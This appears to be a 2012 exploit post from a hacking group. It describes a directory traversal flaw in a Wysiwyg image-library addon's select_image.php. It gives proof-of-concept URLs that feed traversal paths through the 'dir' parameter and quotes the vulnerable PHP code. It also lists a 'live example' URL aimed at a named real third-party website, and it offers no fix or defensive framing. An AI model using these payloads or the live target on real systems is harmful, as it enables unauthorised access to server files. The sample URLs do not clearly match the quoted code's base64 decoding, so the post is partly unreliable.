Home / exploits Wysiwyg Imagelibrary Traversal
Posted on 25 October 2012
# Author : Geek # Title : Wysiwyg Imagelibrary Addons (Folders Traversal) # Date : Today :P # Site : Sec4ever.com # p0x : {x} http://localhost/lol/wysiwyg/addons/imagelibrary/select_image.php?dir=full path to public_html or httpdocs {x} http://localhost/lol/wysiwyg/addons/imagelibrary/select_image.php?dir=..%2Fhome..%2Fuser..%2Fpublic_html # Code : $get_dir = isset($_GET['dir']) ? prepare_input($_GET['dir']) : ""; ...... if($get_dir){ $dir = base64_decode($get_dir); if(substr($dir, -1, 1)!='/') { $dir = $dir . '/'; } $dirok = true; $dirnames = split('/', $dir); for($di=0; $di<sizeof($dirnames); $di++) { if($di<(sizeof($dirnames)-2)) { $dotdotdir = $dotdotdir . $dirnames[$di] . '/'; } } if(substr($dir, 0, 1)=='/') { $dirok = false; } if($dir == $leadon) { $dirok = false; } if($dirok) { $leadon = $dir; } } $opendir = $leadon; if(!$leadon) $opendir = '.'; if(!file_exists($opendir)) { $opendir = '.'; $leadon = $startdir; } # Live Example : {X} http://www.tourismhalong.com/includes/wysiwyg/addons/imagelibrary/select_image.php?dir=%2Fhome%2Ftouris8%2Fpublic_html # Greet'z : b0x,Sec4ever,paulzz,The Sword,The Injector,B07 M4ST3R,Jago :P,LinuxAC,Cmos-CLR :P <3 And All Sec4ever VIP Members And Others :)
